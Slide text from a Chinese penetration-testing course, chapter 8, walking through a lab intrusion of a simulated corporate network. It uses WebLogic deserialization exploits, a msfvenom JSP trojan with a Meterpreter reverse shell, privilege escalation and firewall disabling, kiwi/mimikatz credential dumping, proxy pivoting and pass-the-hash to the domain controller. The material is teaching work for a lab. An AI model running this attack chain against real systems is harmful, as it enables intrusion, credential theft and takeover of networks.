渗透测试技术-教学课件 第八 章 渗透测试综合实验二

第八章渗透测试综合实验二目录CONTENTS01实验概述02实验过程03实验总结实验概述PART.01实验概述本实验环境为模拟企业真实网络环境搭建的漏洞靶场。实验过程分为两个阶段，首先，通过外网渗透Web服务器，获取服务器控制权限。然后，入侵企业内网，具体方法为先建立隧道进行内网渗透，再进一步扫描内网主机，并进行漏洞利用，最终通过域渗透获取域控制器及内网主机权限。迂回渗透，入侵企业内网并将其控制为僵尸网络实验拓扑实验拓扑可以分为两大区域，分别是攻击者区域和服务器区域。实验环境及实验工具1.实验环境（1）本实验的环境通过VMwareWorkstation15.5.6搭建，通过NAT模式及仅主机模式来模拟企业外网及内网，具体网段分配如下：内网网段：/24DMZ网段：/24（2）本实验共5台实验机器，IP地址配置信息见书。本实验所有机器的登录密码均为Test@1234。实验环境及实验工具2.实验工具DirsearchWeblogicScanJava反序列化终极测试工具MetasploitBehinder火狐浏览器实验过程PART.02实验过程——1.环境准备知识回顾（1）配置基本网络（2）开启Web服务01配置网络1.环境准备——渗透步骤（1）在实验机器中，已经完成了内网IP地址的设置，因此只需要在VMwareworkstation

中选择“编辑”→“虚拟网络编辑器”命令，设置虚拟网络（2）在“虚拟网络编辑器”对话框中，将“VMnet1”的网段设置为内网网段，（3）将“VMnet8”的网段设置为外网网段02查看网络配置情况

（1）使用TEST\administrator用户登录DC主机，查看DC主机IP地址配置情况。（2）使用WEB\administrator用户登录WEB主机，查看WEB主机IP地址配置情况。（3）使用TEST\testuser001用户登录PC主机，查看PC主机IP地址配置情况。03开启Web服务1.环境准备——渗透步骤在实验开始之前，需要在WEB主机中开启Web服务，以满足后续步骤的需求。

进入WEB主机的C:\Oracle\Middleware\user_projects\domains\base_domain目录，以管理员身份运行startWebLogic.cmd文件。03开启Web服务1.环境准备——渗透步骤运行之后，在弹出的执行窗口中可以看到如图所示的内容，说明Web服务运行成功。注意：此窗口不能关闭，最小化即可。1.环境准备——渗透结果进入Kali攻击机（账号root，密码Test@1234），打开浏览器，访问Web服务地址，如果出现如图所示界面，就说明Web环境配置成功。实验过程——2.信息收集知识回顾（1）使用Nmap探测系统指纹、开放端口的技巧（2）使用WeblogicScan探测漏洞01使用Nmap探测Web服务器系统指纹、开放端口等信息在Kali终端执行命令“nmap-sV-O03”，探测Web服务器2.信息收集——渗透步骤猜测目标系统可能为Windows7SP1或Windows8.1探测端口，执行命令“nmap-Pn-A-T403”2.信息收集——渗透步骤Web服务器开放了很多常用端口，部分端口可能存在漏洞，请分析各端口可能存在的漏洞。02Web漏洞探测使用WeblogicScan扫描Web服务器。进入/root目录，查看WeblogicScan并将其解压缩。2.信息收集——渗透步骤02Web漏洞探测进入WeblogicScan目录，执行命令“python3WeblogicScan.py[IP][PORT]”，扫描Web服务器漏洞。2.信息收集——渗透步骤2.信息收集——渗透结果经过扫描，发现目标服务器的后台地址，并且WeblogicScan会尝试爆破登录密码，但是由于字典限制，爆破没有成功。2.信息收集——渗透结果尝试访问扫描出来的后台登录地址，确认后台页面真实存在且能够正常访问。访问结果：发现存在Java反序列化漏洞：（1）CVE-2017-3506漏洞（2）CVE-2019-2725漏洞（3）CVE-2019-2729漏洞实验过程——3.漏洞利用获取WebShell（1）冰蝎马WebShell的获取方法（2）MSF-WebShell的获取方法（3）主机信息的收集方法（4）权限提升方法知识回顾01获取WebShell方式一：上传冰蝎马获取WebShell。方式二：上传MSF木马获取WebShell。3.漏洞利用获取WebShell——渗透步骤使用MSF的msfvenom模块生成muma.jsp木马文件，并保存到/var/www/html/目录下01获取WebShell方式二：上传MSF木马获取WebShell。接下来需要将新生成的muma.jsp木马文件通过Java反序列化终极测试工具进行上传，执行命令“serviceapache2start”，启动Apache服务。

在Windows攻击机上访问Kali木马地址。3.漏洞利用获取WebShell——渗透步骤01获取WebShell将木马内容复制到Java反序列化终极测试工具并上传。3.漏洞利用获取WebShell——渗透步骤01获取WebShell在Kali监听反弹的Shell。此处监听反弹Shell的是exploit/multi/handler脚本，攻击载荷为windows/meterpreter/reverse_tcp，此载荷作用是建立反向TCP监听，创建Meterpreter会话3.漏洞利用获取WebShell——渗透步骤01获取WebShell使用浏览器访问上传到Web服务器的木马文件。如果页面显示为空，就说明代码被成功执行。3.漏洞利用获取WebShell——渗透步骤02获取主机信息在MeterpreterShell中，查看当前Shell信息及用户权限，执行命令“shell”，进入目标主机的CMD窗口中。如果出现乱码，就在CMD窗口中执行命令“chcp65001”，解决乱码问题。3.漏洞利用获取WebShell——渗透步骤02获取主机信息执行命令“ipconfig/all”，查看网络配置信息，如图8-41所示，最终发现目标主机存在内网网段，猜测可能存在内网，为下一步内网渗透做准备。3.漏洞利用获取WebShell——渗透步骤02获取主机信息执行命令“systeminfo”，查看操作系统及版本信息，探测出操作系统版本为WindowsServer2008R2，与前面Nmap探测结果做比较，最终可以确认目标系统版本。3.漏洞利用获取WebShell——渗透步骤执行命令“wmicservicelistbrief”，查看系统服务安装及运行情况。3.漏洞利用获取WebShell——渗透步骤执行命令“wmicstartupgetcommand，caption”，查看启动程序信息，发现目标主机并未安装和运行安全防护软件。3.漏洞利用获取WebShell——渗透步骤执行命令“netshadvfirewallshowallprofiles”，查看防火墙状态，最终可以看到防火墙为开启状态。3.漏洞利用获取WebShell——渗透步骤执行命令“systeminfo”，查看系统补丁信息。如果存在未安装补丁的漏洞，就可以直接对漏洞进行利用。3.漏洞利用获取WebShell——渗透步骤系统补丁信息如图所示，可以看到目标主机安装了3个补丁，说明与补丁编号对应的漏洞已经被修复。3.漏洞利用获取WebShell——渗透步骤03提升权限回到MeterpreterShell，执行命令“ps”，查看进程。3.漏洞利用获取WebShell——渗透步骤03提升权限执行命令“getpid”，查看当前Shell的进程号。当前Shell的进程号如图所示，可以看到这个进程很容易被发现，需要进一步隐藏。3.漏洞利用获取WebShell——渗透步骤03提升权限将进程迁移到System权限的进程services.exe执行命令“migrate468”，迁移进程。3.漏洞利用获取WebShell——渗透步骤03提升权限迁移进程后直接变成System权限。执行命令“netshadvfirewallsetallprofilesstateoff”，关闭防火墙。3.漏洞利用获取WebShell——渗透步骤03提升权限由于在前面获取的信息中，确定目标主机操作系统版本低于WindowsServer2012，且未安装KB2871997补丁，因此可以利用Mimikatz工具获取明文密码。在MeterpreterShell中加载Mimikatz，在新版MSF中，Mimikatz已经被kiwi替代。

执行命令“loadkiwi”，加载kiwi。3.漏洞利用获取WebShell——渗透步骤通过上传MSF木马成功获取WebShell，并通过提权成功获取域账号和密码等信息。执行命令“creds_wdigest”，获取域内账号明文信息。3.漏洞利用获取WebShell——渗透结果实验过程——4.内网渗透（1）域内信息的收集方法（2）内网流量的代理方法（3）域内主机权限的获取方法（4）域控制器权限获取方法知识回顾01WEB主机内网信息收集在前面步骤中，已经得知Web服务器存在一个内网网段。在CMD窗口中，继续收集域内信息。执行命令“netconfigworkstation”，查看当前计算机名、用户名、系统版本、工作站域、登录的域等。如果报错，就执行命令“ipconfig/all”。4.内网渗透——渗透步骤01WEB主机内网信息收集执行命令“netuser/domain”，查看域内用户。4.内网渗透——渗透步骤01WEB主机内网信息收集执行命令“netgroup/domain”，查看域用户组列表。4.内网渗透——渗透步骤01WEB主机内网信息收集执行命令“netgroup”domaincomputers“/domain”，查看域内所有主机。4.内网渗透——渗透步骤01WEB主机内网信息收集执行命令“netgroup"domaincontrollers"/domain”，查看域控制器。4.内网渗透——渗透步骤01WEB主机内网信息收集执行命令“netgroup”EnterpriseAdmins“/domain”，查看域管理员，可以看到域管理员为Administrator。4.内网渗透——渗透步骤01WEB主机内网信息收集利用auxiliary/scanner/smb/smb_version模块探测内网存活主机。4.内网渗透——渗透步骤01WEB主机内网信息收集由于未进行内网漫游，因此最终只能得到Web服务器的内网IP地址、操作系统版本及主机名等信息。4.内网渗透——渗透步骤02建立域内连接（内网穿透）回到MeterpreterShell，执行命令“runpost/windows/gather/enum_domain”，查看域控制器IP地址。4.内网渗透——渗透步骤02建立域内连接（内网穿透）执行命令“runpost/multi/manage/autoroute”，添加内网路由。4.内网渗透——渗透步骤02建立域内连接（内网穿透）执行命令“runautoroute-p”，查看路由配置情况。在路由表中，能够看到网段，说明路由配置成功，接下来即可进行内网漫游。4.内网渗透——渗透步骤02建立域内连接（内网穿透）但内网无法直接进行漫游，需要通过代理实现内网穿透。执行命令“background”，挂起当前会话。4.内网渗透——渗透步骤02建立域内连接（内网穿透）通过auxiliary/server/socks_proxy模块建立反向代理。4.内网渗透——渗透步骤02建立域内连接（内网穿透）修改/etc/proxychains4.conf代理配置文件，在最后一行将IP地址修改为，端口修改为1080。4.内网渗透——渗透步骤03其他主机内网信息收集在MeterpreterShell执行命令“runpost/windows/gather/arp_scannerRHOSTS=/24”，探测域内存活主机。4.内网渗透——渗透步骤根据探测结果，还有一台IP地址为01的主机是未知状态。03其他主机内网信息收集使用auxiliary/scanner/smb/smb_version模块探测未知主机。4.内网渗透——渗透步骤探测成功，得到目标主机为Windows7SP1操作系统。04获取域内主机权限使用Nmap，执行命令“proxychains4nmap-Pn-sF01”，探测防火墙。4.内网渗透——渗透步骤04获取域内主机权限执行命令“proxychains4nmap-Pn-sS-T4-sV-p21,22,53,80,135,445,1433,3389,808001”，探测端口和服务。4.内网渗透——渗透步骤04获取域内主机权限使用auxiliary/scanner/smb/smb_ms17_010模块验证是否存在MS17-010漏洞。4.内网渗透——渗透步骤04获取域内主机权限确认存在漏洞后，使用psexec模块利用漏洞。4.内网渗透——渗透步骤04获取域内主机权限执行命令“exploit”，没有返回监听，说明漏洞利用失败。4.内网渗透——渗透步骤因为前面已经通过kiwi获取了域管理员账号的哈希值，所以此时可使用wmiexec.py利用漏洞。04获取域内主机权限执行命令“proxychains4/root/wmiexec.py-hashes00000000000000000000000000000000:b6e259e4e96f44d98ab6eeaa3b328ed7Administrator@01”，发现漏洞最终还是利用失败。4.内网渗透——渗透步骤05获取域控制器权限使用Nmap，执行命令“proxychains4nmap-Pn-sS-T4-sV-p21,22,53,80,135,445,1433,3389,80800”，探测域控制器的端口和服务。4.内网渗透——渗透步骤05获取域控制器权限域控制器开放的端口如图所示，发现域控制器同样开放了445端口。4.内网渗透——渗透步骤05获取域控制器权限尝试使用wmicexec.py利用漏洞。先执行命令“creds_all”，列举所有凭据。4.内网渗透——渗透步骤发现没有Domain为TEST的Administrator用户，需要切换到WEB主机。05获取域控制器权限使用TEST\Administrator用户登录WEB主机。

登录成功之后，再次执行命令“creds_all”，列举所有凭据。4.内网渗透——渗透步骤05获取域控制器权限执行命令“proxychains4/root/wmiexec.py-hashes00000000000000000000000000000000:a803cf45d87009c404eb89df4b1ae94cAdministrator@0”，获取域控制器的管理员权限。4.内网渗透——渗透步骤05获取域控制器权限查看域控制器是否开启防火墙。4.内网渗透——渗透步骤由于乱码问题，无法确定防火墙是否开启。05获取域控制器权限使用exploit/windows/smb/psexec模块，获取Shell。4.内网渗透——渗透步骤05获取域控制器权限成功获取反弹的Shell，并获取Sy